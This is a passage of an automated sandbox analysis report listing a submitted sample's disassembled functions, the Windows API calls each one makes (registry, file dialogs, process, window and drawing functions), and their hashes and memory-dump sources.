Opcode ID: 41516447cc9a8e09f5afa1a83fb90a7183cc3a29b902d7bdaa61c2ca64bb817a
Instruction ID: b937be34688cd1dc328161578c415a88eb004ea23cf791c959ac556edd877304
Opcode Fuzzy Hash: 41516447cc9a8e09f5afa1a83fb90a7183cc3a29b902d7bdaa61c2ca64bb817a
Instruction Fuzzy Hash: 6851BE72A00216BBEB258F64DC81FBF7BAAEB84750F158629FC05D6151EB34DC40DEA0

Function 0098BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00909CB3: _wcslen.LIBCMT ref: 00909CBD

Part of subcall function 0098C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0098B6AE,?,?), ref: 0098C9B5
Part of subcall function 0098C998: _wcslen.LIBCMT ref: 0098C9F1
Part of subcall function 0098C998: _wcslen.LIBCMT ref: 0098CA68
Part of subcall function 0098C998: _wcslen.LIBCMT ref: 0098CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0098BCCA
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0098BD25
RegCloseKey.ADVAPI32(00000000), ref: 0098BD6A
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0098BD99
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0098BDF3
RegCloseKey.ADVAPI32(?), ref: 0098BDFF

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: 9546a91df16063170c66a6c30ff4465df83f2defd48ff227b7edd15a3b494cf7
Instruction ID: a0f7ea60358ee17a3f1e618a50b166e049d80c6d635ffa5fe815ce81d3328393
Opcode Fuzzy Hash: 9546a91df16063170c66a6c30ff4465df83f2defd48ff227b7edd15a3b494cf7
Instruction Fuzzy Hash: 29817F71208241EFD714EF24C895E2ABBE9FF84308F18895DF5558B2A2DB31ED45CB92

Function 0095F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 0095F7B9
SysAllocString.OLEAUT32(00000001), ref: 0095F860
VariantCopy.OLEAUT32(0095FA64,00000000), ref: 0095F889
VariantClear.OLEAUT32(0095FA64), ref: 0095F8AD
VariantCopy.OLEAUT32(0095FA64,00000000), ref: 0095F8B1
VariantClear.OLEAUT32(?), ref: 0095F8BB

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: 67277a24b65f85b43ea4c217c2815dd447bb7f260e98bcff04f399b0771d9e45
Instruction ID: 3cb5dd93adb7b73622300dc11f85dbe19a4cb66398f4e24f1d3b622bb14da9f0
Opcode Fuzzy Hash: 67277a24b65f85b43ea4c217c2815dd447bb7f260e98bcff04f399b0771d9e45
Instruction Fuzzy Hash: 6451B635610314AACF14EB66D8B5B29B3A8EF85331B248867ED06DF291DB748C84C796

Function 0097910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 00907620: _wcslen.LIBCMT ref: 00907625

Part of subcall function 00906B57: _wcslen.LIBCMT ref: 00906B6A

GetOpenFileNameW.COMDLG32(00000058), ref: 009794E5
_wcslen.LIBCMT ref: 00979506
_wcslen.LIBCMT ref: 0097952D
GetSaveFileNameW.COMDLG32(00000058), ref: 00979585

Strings

X, xrefs: 00979412

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: 1f6b94ca5a30565f872a6f2f991918efec56240013e7d0b774d9df8fd4c2d26f
Instruction ID: 9d36b163d75fc70099a23bdf14a043eae46f14b99dbe12ca040653b9a2e96d1c
Opcode Fuzzy Hash: 1f6b94ca5a30565f872a6f2f991918efec56240013e7d0b774d9df8fd4c2d26f
Instruction Fuzzy Hash: 08E16C726083518FD724EF24C881B6AB7E4EFC5314F04896DF8999B2A2DB31DD45CB92

Function 0091920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00919BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00919BB2

BeginPaint.USER32(?,?,?), ref: 00919241
GetWindowRect.USER32(?,?), ref: 009192A5
ScreenToClient.USER32(?,?), ref: 009192C2
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 009192D3
EndPaint.USER32(?,?,?,?,?), ref: 00919321
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 009571EA

Part of subcall function 00919339: BeginPath.GDI32(00000000), ref: 00919357

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: a0f2d45bb4f7b5c6c809e01a97f9ceb39168225f200b9b5c6718a19035383bd4
Instruction ID: 7424ada58acc774235661c41ce3a9a3c12da79b2ac3774d3bc37297eac1a8912
Opcode Fuzzy Hash: a0f2d45bb4f7b5c6c809e01a97f9ceb39168225f200b9b5c6718a19035383bd4
Instruction Fuzzy Hash: 6F41E271209305AFD720DF65DCA4FBA7BB8EF85361F04062AF964872E1C7309985EB61

Function 009707EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 0097080C
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00970847
EnterCriticalSection.KERNEL32(?), ref: 00970863
LeaveCriticalSection.KERNEL32(?), ref: 009708DC
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 009708F3
InterlockedExchange.KERNEL32(?,000001F6), ref: 00970921

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: f22989e2db5ace63ef1b9644c338d8a380310abfcc972f084f164d6ba478150a
Instruction ID: 41cbf9c47fd1ff4b594dd878eaa7258afedf3ae90951a35a989ca23f5be7fecd
Opcode Fuzzy Hash: f22989e2db5ace63ef1b9644c338d8a380310abfcc972f084f164d6ba478150a
Instruction Fuzzy Hash: 55417C72A00209EFDF14DF54DC85AAA77B8FF84300F1480A5ED049A29BD731DE60DBA4

Function 009981DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0095F3AB,00000000,?,?,00000000,?,0095682C,00000004,00000000,00000000), ref: 0099824C
EnableWindow.USER32(00000000,00000000), ref: 00998272
ShowWindow.USER32(FFFFFFFF,00000000), ref: 009982D1
ShowWindow.USER32(00000000,00000004), ref: 009982E5
EnableWindow.USER32(00000000,00000001), ref: 0099830B
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0099832F

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: e0ffde2aaf886fb333452755ed57e2dace9eda34a32577fa404c7aea96d314b6
Instruction ID: f44f4029b8bf238540f8dd5b508c91579c12d60100669af14f4c047e8c1fa5fd
Opcode Fuzzy Hash: e0ffde2aaf886fb333452755ed57e2dace9eda34a32577fa404c7aea96d314b6
Instruction Fuzzy Hash: 7E41C531606644AFDF15CF18DC99BE97BE4FB0B754F18416EE5184B263CB31A881DB50

Function 00964C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00964C95
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00964CB2
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00964CEA
_wcslen.LIBCMT ref: 00964D08
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00964D10
_wcsstr.LIBVCRUNTIME ref: 00964D1A

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: 07ee1893ed78e9b7a052c4487be615811111256b69f5e533f68b7027362d8e3f
Instruction ID: c100704e9f61433b2d8a4ad9360970105b18a0e2b24e187fa144af2dc8e992c9
Opcode Fuzzy Hash: 07ee1893ed78e9b7a052c4487be615811111256b69f5e533f68b7027362d8e3f
Instruction Fuzzy Hash: 0C213872608205BBEB155B79EC19FBF7BACDF85750F10803AF805CA191EA65DC40D6A0

Function 0097581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 00903AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00903A97,?,?,00902E7F,?,?,?,00000000), ref: 00903AC2

_wcslen.LIBCMT ref: 0097587B
CoInitialize.OLE32(00000000), ref: 00975995
CoCreateInstance.OLE32(0099FCF8,00000000,00000001,0099FB68,?), ref: 009759AE
CoUninitialize.OLE32 ref: 009759CC

Strings

.lnk, xrefs: 00975876, 009758C1, 00975985

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: 8a0fe5307ba0ec56c068017e0757e6d539897322e3d262114664568c22d69047
Instruction ID: 4b63bf7dfa9ef1988397a876fedff71b077ea88aa7af858d9410ca29fae885f4
Opcode Fuzzy Hash: 8a0fe5307ba0ec56c068017e0757e6d539897322e3d262114664568c22d69047
Instruction Fuzzy Hash: 07D16572A087019FC754DF24C480A2ABBE9FF89714F15885DF8899B3A1DB71EC45CB92

Function 0096175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00960FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00960FCA
Part of subcall function 00960FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00960FD6
Part of subcall function 00960FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00960FE5
Part of subcall function 00960FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00960FEC
Part of subcall function 00960FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00961002

GetLengthSid.ADVAPI32(?,00000000,00961335), ref: 009617AE
GetProcessHeap.KERNEL32(00000008,00000000), ref: 009617BA
HeapAlloc.KERNEL32(00000000), ref: 009617C1
CopySid.ADVAPI32(00000000,00000000,?), ref: 009617DA
GetProcessHeap.KERNEL32(00000000,00000000,00961335), ref: 009617EE
HeapFree.KERNEL32(00000000), ref: 009617F5

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: aff5932224a77fd6098676dbb6bb617a73cb41c5fd0afbc01a5ec36f85089f98
Instruction ID: e012b10bdcab84c68d033e6a894f41d35401c2d30a3d56e8e30c29aec0c324f5
Opcode Fuzzy Hash: aff5932224a77fd6098676dbb6bb617a73cb41c5fd0afbc01a5ec36f85089f98
Instruction Fuzzy Hash: 9511DD72618205FFDB209FA8CC49BAF7BBDEF46355F58441AF481A7210D736AA40DB60

Function 009614CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 009614FF
OpenProcessToken.ADVAPI32(00000000), ref: 00961506
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00961515
CloseHandle.KERNEL32(00000004), ref: 00961520
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0096154F
DestroyEnvironmentBlock.USERENV(00000000), ref: 00961563

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 6e06c49050c6958c483302ffa5a882e3b9ab21b85a038a117193fe9b463565ee
Instruction ID: 1bab1d9816483394f40e3818c37a1c823ed5e6ebb10a0de59c24aeca748165ec
Opcode Fuzzy Hash: 6e06c49050c6958c483302ffa5a882e3b9ab21b85a038a117193fe9b463565ee
Instruction Fuzzy Hash: 87113DB260520DABDF118F98DE49FDE7BADEF48744F084015FA05A2060C375CE60EB61

Function 00923382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00923379,00922FE5), ref: 00923390
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0092339E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 009233B7
SetLastError.KERNEL32(00000000,?,00923379,00922FE5), ref: 00923409

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 1721fab0dfba4b743043d78bd90a0de965c1d435fdb143480d83a21e75f190bf
Instruction ID: 74c13ea3c92b3c48685914b66871c801035dc3ed44fd87e10e41f99b868dffe0
Opcode Fuzzy Hash: 1721fab0dfba4b743043d78bd90a0de965c1d435fdb143480d83a21e75f190bf
Instruction Fuzzy Hash: 4B014773A1D731BEAA2477747C86B272E9CEB45779720822AF410801F9EF194E036554

Function 00932D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00935686,00943CD6,?,00000000,?,00935B6A,?,?,?,?,?,0092E6D1,?,009C8A48), ref: 00932D78
_free.LIBCMT ref: 00932DAB
_free.LIBCMT ref: 00932DD3
SetLastError.KERNEL32(00000000,?,?,?,?,0092E6D1,?,009C8A48,00000010,00904F4A,?,?,00000000,00943CD6), ref: 00932DE0
SetLastError.KERNEL32(00000000,?,?,?,?,0092E6D1,?,009C8A48,00000010,00904F4A,?,?,00000000,00943CD6), ref: 00932DEC
_abort.LIBCMT ref: 00932DF2

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 405c260fd5c2aee454d8ded98e38322cc4e22dbe28184d0adc8cf514c95ac6ec
Instruction ID: 67a9eae89f7bb2e5e979039ba0cfb7600c6817636fb4590c9362e15991f71f25
Opcode Fuzzy Hash: 405c260fd5c2aee454d8ded98e38322cc4e22dbe28184d0adc8cf514c95ac6ec
Instruction Fuzzy Hash: A4F0FC7554D6102BC6123739BC07F5F2A5DAFC27A1F254419F834D61D2EF3488026D71

Function 00998A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00919639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00919693
Part of subcall function 00919639: SelectObject.GDI32(?,00000000), ref: 009196A2
Part of subcall function 00919639: BeginPath.GDI32(?), ref: 009196B9
Part of subcall function 00919639: SelectObject.GDI32(?,00000000), ref: 009196E2

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00998A4E
LineTo.GDI32(?,00000003,00000000), ref: 00998A62
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00998A70
LineTo.GDI32(?,00000000,00000003), ref: 00998A80
EndPath.GDI32(?), ref: 00998A90
StrokePath.GDI32(?), ref: 00998AA0

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: b88dba454a3315492b8b18646aa603cecdf3b79602a685eca96e641b5085be6e
Instruction ID: 6747c4adf60e1693b31659bbd018d549b72fc6319c9ba5d2e49fce6aaaf87457
Opcode Fuzzy Hash: b88dba454a3315492b8b18646aa603cecdf3b79602a685eca96e641b5085be6e
Instruction Fuzzy Hash: 75111E7604410CFFDF119F94EC48E9A7F6DEB08390F008012FA1996161C7719D55EF60

Function 009651FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00965218
GetDeviceCaps.GDI32(00000000,00000058), ref: 00965229
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00965230
ReleaseDC.USER32(00000000,00000000), ref: 00965238
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0096524F
MulDiv.KERNEL32(000009EC,00000001,?), ref: 00965261

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 52a0ed4787569a258d1ed66c29793bc6cbaf0988f23e1934b16d526abbf19737
Instruction ID: a34edf4cb33f7a38d9be3bf6ffb39fa14db0515bca752e26a4f1edb4bc4fb4c1
Opcode Fuzzy Hash: 52a0ed4787569a258d1ed66c29793bc6cbaf0988f23e1934b16d526abbf19737
Instruction Fuzzy Hash: 530162B5E04719BBEF109BAA9D49F5EBFB8EF48751F044066FA04A7281D6709C00DFA0

Function 00901BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00901BF4
MapVirtualKeyW.USER32(00000010,00000000), ref: 00901BFC
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00901C07
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00901C12
MapVirtualKeyW.USER32(00000011,00000000), ref: 00901C1A
MapVirtualKeyW.USER32(00000012,00000000), ref: 00901C22

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 5694d32f997ea08524fa773ef621c77aa283881aedb3d4131fc01726ecceaa9e
Instruction ID: d19c29aee1e015a06a4ee404ffe4a1073fb7bf3e5a7d8574986a43a3f761d775
Opcode Fuzzy Hash: 5694d32f997ea08524fa773ef621c77aa283881aedb3d4131fc01726ecceaa9e
Instruction Fuzzy Hash: 340167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5

Function 0096EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0096EB30
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0096EB46
GetWindowThreadProcessId.USER32(?,?), ref: 0096EB55
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0096EB64
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0096EB6E
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0096EB75

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
